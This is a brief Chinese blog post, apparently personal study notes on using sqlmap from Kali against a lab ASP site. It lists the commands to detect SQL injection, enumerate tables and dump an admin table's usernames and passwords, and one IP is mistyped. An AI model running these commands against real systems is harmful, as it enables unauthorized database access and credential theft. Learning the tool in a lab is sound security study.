您的位置: 首页  >  文章  >  sqlmap

sqlmap

分类: 文章 2024-02-18 12:20:28

欢迎关注博主的公众号:薛定谔的小鱼儿

自学sqlmap,以下是我的部分总结,如果有错误,希望各位大神指出,谢谢。

我在kail环境下进行sqlmap学习。首先进入sqlmap

在安装了sqlmap后,在终端直接输入sqlmap,进入sqlmap。

sqlmap

在进入sqlmap后,选择目标url,如:sqlmap -u http://192.168.1.3:8008/onews.asp?id=45

-u 后是目标url

sqlmap

返回结果可以看到目标主机的操作系统是Windows 2003/XP;web应用技术是asp.net ,IIS,ASP。数据库:access

查看用户

sqlmap

探测数据库中和表信息:sqlmap -u http://19.168.1.3:8008/onews.asp?id=45 --dump -tables

sqlmap

可以看到数据库的结构

查看admin和password的内容:sqlmap -u http://19.168.1.3:8008/onews.asp?id=45 --dump -T admin -C admin,password

sqlmap

成功**。


相关推荐